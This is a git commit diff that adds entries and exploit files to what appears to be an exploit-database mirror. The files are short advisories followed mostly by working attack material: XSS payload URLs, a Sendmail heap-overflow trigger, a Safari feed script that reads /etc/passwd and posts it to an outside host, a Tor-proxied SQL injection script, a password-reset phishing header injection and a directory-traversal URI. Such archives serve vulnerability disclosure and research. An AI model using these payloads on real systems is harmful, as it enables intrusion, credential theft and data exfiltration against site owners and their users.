Updated 04_24_2014
This commit is contained in:
parent
038ba787cc
commit
620b63e883
12 changed files with 333 additions and 1 deletions
13
files.csv
13
files.csv
|
@ -29722,9 +29722,20 @@ id,file,description,date,author,platform,type,port
|
|||
32973,platforms/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",hardware,webapps,0
|
||||
32974,platforms/multiple/remote/32974.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/configuration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
|
||||
32975,platforms/multiple/remote/32975.txt,"Glassfish Enterprise Server 2.1 Admin Console /customMBeans/customMBeans.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
|
||||
32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / RCE Exploit via Static Encryption Key",2014-04-22,"Mehmet Dursun Ince",php,webapps,0
|
||||
32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / RCE Exploit via Static Encryption Key",2014-04-22,"Mehmet Ince",php,webapps,0
|
||||
32977,platforms/multiple/remote/32977.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/resources.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
|
||||
32978,platforms/multiple/remote/32978.txt,"Glassfish Enterprise Server 2.1 Admin Console /sysnet/registration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
|
||||
32979,platforms/multiple/remote/32979.txt,"Glassfish Enterprise Server 2.1 Admin Console /webService/webServicesGeneral.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
|
||||
32980,platforms/multiple/remote/32980.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/auditModuleEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0
|
||||
32981,platforms/multiple/remote/32981.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/jdbcResourceEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0
|
||||
32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 (sorter.php, sorter_value param) - SQL Injection",2014-04-22,chapp,php,webapps,80
|
||||
32985,platforms/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 'item.php' Cross-Site Scripting Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0
|
||||
32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 'Forgot Password' Input Validation Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0
|
||||
32987,platforms/multiple/remote/32987.txt,"Woodstock 4.2 404 Error Page Cross Site Scripting Vulnerability",2009-05-05,DSecRG,multiple,remote,0
|
||||
32988,platforms/php/webapps/32988.txt,"VerliAdmin 0.3 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-05-05,TEAMELITE,php,webapps,0
|
||||
32989,platforms/php/webapps/32989.txt,"Verlihub Control Panel 1.7 Multiple Cross-Site Scripting Vulnerabilities",2009-05-06,TEAMELITE,php,webapps,0
|
||||
32991,platforms/php/webapps/32991.txt,"Claroline 1.8.11 'claroline/linker/notfound.php' Cross-Site Scripting Vulnerability",2009-05-08,"Gerendi Sandor Attila",php,webapps,0
|
||||
32992,platforms/php/webapps/32992.txt,"MagpieRSS 0.72 Cross Site Scripting And HTML Injection Vulnerabilities",2009-05-08,"Justin Klein Keane",php,webapps,0
|
||||
32993,platforms/php/webapps/32993.txt,"Dacio's Image Gallery 1.6 Multiple Remote Vulnerabilities",2009-05-11,ahmadbady,php,webapps,0
|
||||
32994,platforms/multiple/remote/32994.xml,"Apple Safari <= 3.2.2 'feed:' URI Multiple Input Validation Vulnerabilities",2009-05-12,"Billy Rios",multiple,remote,0
|
||||
32995,platforms/linux/dos/32995.txt,"Sendmail 8.12.x 'X-header' Remote Heap Buffer Overflow Vulnerability",2009-05-27,"Simple Nomad",linux,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
53
platforms/linux/dos/32995.txt
Executable file
53
platforms/linux/dos/32995.txt
Executable file
|
@ -0,0 +1,53 @@
|
|||
source: http://www.securityfocus.com/bid/34944/info
|
||||
|
||||
Sendmail is prone to a heap-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer.
|
||||
|
||||
Successfully exploiting this issue may allow an attacker to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely crash the application.
|
||||
|
||||
Versions prior to Sendmail 8.13.2 are vulnerable.
|
||||
|
||||
$ telnet example.com 25
|
||||
Trying ...
|
||||
Connected to example.com.
|
||||
Escape character is '^]'.
|
||||
220 example.com ESMTP Sendmail 8.12.10/8.12.10; Fri, 3 Dec 2004 12:00:59 -06
|
||||
00
|
||||
mail from:example@example.org
|
||||
250 2.1.0 example@example.org... Sender ok
|
||||
rcpt to:example@example.com
|
||||
250 2.1.5 example@example.com... Recipient ok
|
||||
data
|
||||
354 Enter mail, end with "." on a line by itself
|
||||
X-Testing: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
|
||||
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCC
|
||||
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDD
|
||||
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
|
||||
DDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
|
||||
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
|
||||
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGG
|
||||
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
|
||||
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
|
||||
HHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
|
||||
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
|
||||
JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
|
||||
BBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
|
||||
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
|
||||
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEE
|
||||
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
|
||||
EEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
|
||||
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
|
||||
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHH
|
||||
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIII
|
||||
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
|
||||
IIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
|
||||
JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ123456AAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBB
|
||||
BBX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
|
||||
|
||||
|
||||
.
|
||||
|
||||
250 2.0.0 iB3I0xxp005530 Message accepted for delivery
|
||||
|
9
platforms/multiple/remote/32987.txt
Executable file
9
platforms/multiple/remote/32987.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/34829/info
|
||||
|
||||
Woodstock is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
|
||||
|
||||
Woodstock 4.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/theme/META-INF/>+ACJ-+AD4APB-SCRIPT+AD7-alert(+ACI-DSecRG_XSS+ACI-)+ADz-/SCRIPT+AD7-
|
34
platforms/multiple/remote/32994.xml
Executable file
34
platforms/multiple/remote/32994.xml
Executable file
|
@ -0,0 +1,34 @@
|
|||
source: http://www.securityfocus.com/bid/34925/info
|
||||
|
||||
Apple Safari is prone to multiple input-validation vulnerabilities.
|
||||
|
||||
An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious website.
|
||||
|
||||
Successfully exploiting these issues will allow the attacker to execute arbitrary JavaScript code in the local security zone. This may allow the attacker to obtain sensitive information that can aid in further attacks; other consequences may also occur.
|
||||
|
||||
These issues affect versions prior to Safari 3.2.3.
|
||||
|
||||
<summary>On the Cylon baseship, Cavil confronts the last member of the Final Five.
|
||||
<script>
|
||||
var contents;
|
||||
var req;
|
||||
req = new XMLHttpRequest();
|
||||
req.onreadystatechange = processReqChange;
|
||||
req.open(?GET?, ?file:///etc/passwd?, true);
|
||||
req.send(?);
|
||||
|
||||
function processReqChange() {
|
||||
if (req.readyState == 4) {
|
||||
contents = req.responseText;
|
||||
sendit2XSSniper(contents);
|
||||
}
|
||||
}
|
||||
function sendit2XSSniper(stuff){
|
||||
var req2;
|
||||
req2 = new XMLHttpRequest();
|
||||
req2.open(?POST?, ?http://www.example.com?, true);
|
||||
req2.setRequestHeader(?Content-Type?,'application/x-www-form-urlencoded?);
|
||||
req2.send(?filename=etcpasswd&filecontents=?+escape(stuff));
|
||||
}
|
||||
</script>
|
||||
</summary>
|
86
platforms/php/webapps/32983.txt
Executable file
86
platforms/php/webapps/32983.txt
Executable file
|
@ -0,0 +1,86 @@
|
|||
-----BEGIN PGP SIGNED MESSAGE-----
|
||||
Hash: SHA1
|
||||
|
||||
Happy easter..
|
||||
|
||||
* Product: phpManufaktur / kitForm
|
||||
* Version: <= 0.43 (2013-11-22)
|
||||
* Date: 2014-04-20
|
||||
* Criticality: Medium
|
||||
* Exploitable from: Remote
|
||||
* Impact: SQL Injection
|
||||
* Product URL: https://github.com/phpManufaktur/kitForm
|
||||
|
||||
1. Vendor Description:
|
||||
|
||||
kitForm is an extension for the Customer Relationship Management (CRM)
|
||||
KeepInTouch and the Content Management Systems WebsiteBaker or LEPTON
|
||||
CMS. It enables the easy creation of forms and dialogs for the CMS and
|
||||
the CRM.
|
||||
|
||||
2. Vulnerability
|
||||
|
||||
A SQL injection error within the sorter.php file can be exploited by
|
||||
unauthenticated people to conduct SQL injection attacks. The file does
|
||||
not sanitize the "sorter_value" parameter before using the value in a
|
||||
SQL query.
|
||||
|
||||
A successful exploit can extract database content and e.g.
|
||||
administrative credentials (password hash).
|
||||
|
||||
22. $sorter_table = $_POST['sorter_table'];
|
||||
23. switch ($sorter_table):
|
||||
24. case 'mod_kit_form':
|
||||
25. // Frageboegen sortieren
|
||||
26. $rowIDs = implode(',', $_POST['rowID']);
|
||||
27. $sorter_value = $_POST['sorter_value'];
|
||||
28. $SQL = sprintf( "UPDATE %smod_kit_form_table_sort
|
||||
SET sort_order='%s' WHERE sort_table='%s'
|
||||
AND sort_value='%s'",
|
||||
29. TABLE_PREFIX, $rowIDs, $sorter_table, $sorter_value);
|
||||
30. $database->query($SQL);
|
||||
|
||||
3. Exploit
|
||||
|
||||
1. import httplib2, socks, urllib
|
||||
2.
|
||||
3. ### Change these values ###
|
||||
4. target = "http://fbi.gov"
|
||||
5. SQLi = "or 1=1 #"
|
||||
6. tor_http_proxy = 8118
|
||||
7.
|
||||
8. httplib2.debuglevel=4
|
||||
9.
|
||||
10. headers = {
|
||||
11. 'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1;
|
||||
zh-CN; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4',
|
||||
12. 'Content-Type': 'application/x-www-form-urlencoded'
|
||||
13. }
|
||||
14. h = httplib2.Http(proxy_info = httplib2.ProxyInfo(
|
||||
socks.PROXY_TYPE_HTTP, '127.0.0.1', tor_http_proxy, timeout=30)
|
||||
15.
|
||||
16. data = dict(
|
||||
17. rowID = "1",
|
||||
18. sorter_table = "mod_kit_form",
|
||||
19. sorter_value = "AAAA' %s" % SQLi # <-- injection
|
||||
20. )
|
||||
21.
|
||||
22. resp, content = h.request(
|
||||
"%s" % target, "POST", urllib.urlencode(data), headers=headers)
|
||||
23
|
||||
24 print resp
|
||||
25 print content
|
||||
|
||||
xoxo chapp
|
||||
-----BEGIN PGP SIGNATURE-----
|
||||
Version: GnuPG v1.4.11 (GNU/Linux)
|
||||
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
|
||||
|
||||
iQEcBAEBAgAGBQJTU9cEAAoJECKwmdefSHejw94H/384qa0OpLaF93UNisobw0rl
|
||||
pp7Y6xKvfZn2mtYHxCCMzRmV2FngJHYP1L3pMTfB0VesLB49QBrzp5TOVDkvcoBx
|
||||
q4D9VOXLxWteedH3S73+plvhKtbQZHAQ74PwY31F2idrzFO10oE4kw6UDDCdpxfq
|
||||
Z6JVaJQAym3rDuRD20SAjp0opfP0BmijfNmuothfC9DzEQtzU44vWrac3ZSda+lL
|
||||
VKVFr5NvRQ032G0CHvx+WT8yoFPnFxybwYFbW3Exr7QedjrM8eIpf47xgrzytM7i
|
||||
sMWpBl/ZqdBkh1LrIin3lKuQgMIeHs+2Rb6Rbep72RKqVxfJy6AXPqhN0804GsU=
|
||||
=AylG
|
||||
-----END PGP SIGNATURE-----
|
32
platforms/php/webapps/32985.xml
Executable file
32
platforms/php/webapps/32985.xml
Executable file
|
@ -0,0 +1,32 @@
|
|||
source: http://www.securityfocus.com/bid/34825/info
|
||||
|
||||
IceWarp Merak Mail Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal potentially sensitive information and launch other attacks.
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<rss version="2.0">
|
||||
<channel>
|
||||
<title>RedTeam Pentesting</title>
|
||||
<link
|
||||
href="http://www.example.come"
|
||||
rel="self"
|
||||
type="application/rss+xml" />
|
||||
<link>http://www.example.come</link>
|
||||
<description>Seeing your network from the attacker's perspective</description>
|
||||
<pubDate>Mon, 16 Apr 2009 05:23:42 +0000</pubDate>
|
||||
<language>de</language>
|
||||
<item>
|
||||
<title><script>alert('Title: Your session id is: ' +
|
||||
window.top.sSID);</script></title>
|
||||
<link>http://www.example.come/pentest</link>
|
||||
<pubDate>Mon, 16 Apr 2009 05:23:42 +0000</pubDate>
|
||||
<description>
|
||||
<div o<xml>nmouseover="alert('Description: Your session id is: ' +
|
||||
window.top.sSID)">
|
||||
RedTeam Pentesting XSS
|
||||
</div>
|
||||
</description>
|
||||
</item>
|
||||
</channel>
|
||||
</rss>
|
51
platforms/php/webapps/32986.py
Executable file
51
platforms/php/webapps/32986.py
Executable file
|
@ -0,0 +1,51 @@
|
|||
source: http://www.securityfocus.com/bid/34827/info
|
||||
|
||||
IceWarp Merak Mail Server is prone to an input-validation vulnerability because it uses client-supplied data when performing a 'Forgot Password' function.
|
||||
|
||||
Attackers can exploit this issue via social-engineering techniques to obtain valid users' login credentials; other attacks may also be possible.
|
||||
|
||||
#! /usr/bin/env python
|
||||
import urllib2, sys
|
||||
|
||||
conf = {
|
||||
"captcha_uid": "5989688782215156001239966846169",
|
||||
"captcha": "4SJZ Z4GY",
|
||||
"forgot": "user@example.com",
|
||||
"replyto": "attacker@example.com",
|
||||
"server": "http://www.example.com/webmail/server/webmail.php"
|
||||
}
|
||||
|
||||
data = """
|
||||
<iq type="set">
|
||||
<query xmlns="webmail:iq:auth">
|
||||
<forgot>%(forgot)s</forgot>
|
||||
<captcha uid="%(captcha_uid)s">%(captcha)s</captcha>
|
||||
<subject>
|
||||
<![CDATA[
|
||||
Account expiration %EMAIL%\r\nReply-To: %(replyto)s\n
|
||||
]]>
|
||||
</subject>
|
||||
<message>
|
||||
Dear %FULLNAME%,
|
||||
|
||||
your account
|
||||
|
||||
Username: %USERNAME%
|
||||
Password: %PASSWORD%
|
||||
|
||||
has expired. To renew the account, please reply to this email
|
||||
leaving the email body intact, so we know the account is still
|
||||
used.
|
||||
|
||||
Kind regards,
|
||||
|
||||
the IT department
|
||||
</message>
|
||||
</query>
|
||||
</iq>
|
||||
""" % conf
|
||||
|
||||
req = urllib2.Request(conf['server'])
|
||||
req.add_data(data)
|
||||
res = urllib2.urlopen(req)
|
||||
print repr(res.read())
|
12
platforms/php/webapps/32988.txt
Executable file
12
platforms/php/webapps/32988.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/34845/info
|
||||
|
||||
VerliAdmin is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
The issues affect VerliAdmin 0.3.7 and 0.3.8; other versions may also be affected.
|
||||
|
||||
http//www.example.com/index.php?q=bantest&nick="><script>alert(String.fromCharCode(88,83,83))</script>
|
||||
http//www.example.com/index.php?nick="'/><script>alert(String.fromCharCode(88,83,83))</script>
|
||||
http//www.example.com/index.php?q="'/><script>alert(String.fromCharCode(88,83,83))</script>
|
||||
http//www.example.com/index.php?"'/><script>alert(String.fromCharCode(88,83,83))</script>
|
11
platforms/php/webapps/32989.txt
Executable file
11
platforms/php/webapps/32989.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/34856/info
|
||||
|
||||
Verlihub Control Panel is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
The issues affect Verlihub Control Panel 1.7e; other versions may also be affected.
|
||||
|
||||
http://www.example.com/index.php?page=login&nick="><script>alert("Vulnerable");</script>
|
||||
http://www.example.com/index.php?page=login&nick="><iframe src=
|
||||
http://www.example.com/index.html?news></iframe>
|
9
platforms/php/webapps/32991.txt
Executable file
9
platforms/php/webapps/32991.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/34883/info
|
||||
|
||||
Claroline is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Claroline 1.8.11 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/referer/?"><script>alert(123)</script><a%20href="
|
9
platforms/php/webapps/32992.txt
Executable file
9
platforms/php/webapps/32992.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/34891/info
|
||||
|
||||
MagpieRSS is prone to multiple cross-site scripting issues and an HTML-injection issue because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
|
||||
|
||||
MagpieRSS 0.72 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/magpierss-0.72/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script http://www.example.com/magpierss-0.72/scripts/magpie_simple.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script <?xml version="1.0" encoding="utf-8"?> <rss version="2.0" xml:base="http://www.example.com" xmlns:dc="http://purl.org/dc/elements/1.1/"> <channel> <title>Justin.MadIrish.net <script>alert('xss title');</script>- Justin's Personal Homepage</title> <link>http://www.example.com</link> <description>Close personal friends with Evil Eve.</description> <language>en</language> <item> <title>Disturbing<script>alert('xss title');</script> XSS<script>alert('xss title');</script></title> <link>http://www.example.com/node/343 <script>alert('xss link');</script></link> <description>foobar</description> <pubDate>Wed, 04 Mar 2009 13:42:09 +0000</pubDate> <dc:creator>justin</dc:creator> <guid isPermaLink="false">343 at http://www.example.com</guid> </item> </channel> </rss>
|
15
platforms/php/webapps/32993.txt
Executable file
15
platforms/php/webapps/32993.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/34906/info
|
||||
|
||||
Dacio's Image Gallery is prone to multiple remote vulnerabilities:
|
||||
|
||||
- An arbitrary-file-upload vulnerability
|
||||
- An authentication-bypass vulnerability
|
||||
- A directory-traversal vulnerability
|
||||
|
||||
An attacker can exploit these issues to upload and execute arbitrary script code on an affected computer with the privileges of the webserver process, view arbitrary local files, or gain unauthorized access to the affected application.
|
||||
|
||||
Dacio's Image Gallery 1.6 is vulnerable; other versions may also be affected.
|
||||
|
||||
The following example URI for the directory-traversal vulnerability is available:
|
||||
|
||||
http://www.example.com/Dacio_imgGal-v1.6/index.php?gallery=../config.inc%00
|
Loading…
Add table
Reference in a new issue